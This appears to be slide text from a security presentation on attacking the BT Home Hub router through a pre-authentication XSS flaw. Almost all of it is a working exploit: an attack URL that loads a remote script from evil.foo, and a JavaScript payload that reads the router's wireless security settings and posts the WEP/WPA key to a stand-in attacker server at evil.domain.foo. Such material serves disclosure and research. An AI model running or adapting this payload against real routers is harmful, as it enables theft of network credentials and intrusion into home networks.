PWNING BT HOME HUB: preauth leak + preauth XSS
çSteal WEP/WPA key
¼Attack URL: http://192.168.1.254/cgi/b/ic/connect/?url="><script%20src=http://evil.foo/xss.js></script><a%20b%3d
¼Payload (‘xss.js’)
¼ document.write("<body>"); var req; var url="/cgi/b/_wli_/seccfg/?ce=1&be=1&l0=4&l1=0";
¼ function loadXMLDoc(url) {  [snip] }
¼ function processReqChange() {
¼ if (req.readyState == 4)  {
¼ if (req.status == 200)  {
¼              var f=document.createElement("form");
¼                 f.name="myform";
¼ f.action="http://evil.domain.foo/bthh/steal.php";
¼            // POST is handy for submitting large chuncks of data
¼                 f.method="POST";   var t = document.createElement('INPUT');    t.type='hidden';   t.name='data';
¼                 t.value=escape(req.responseText);     f.appendChild(t);     document.body.appendChild(f);
¼                 f.submit();
¼               }}}
¼ loadXMLDoc(url); document.write("</body>");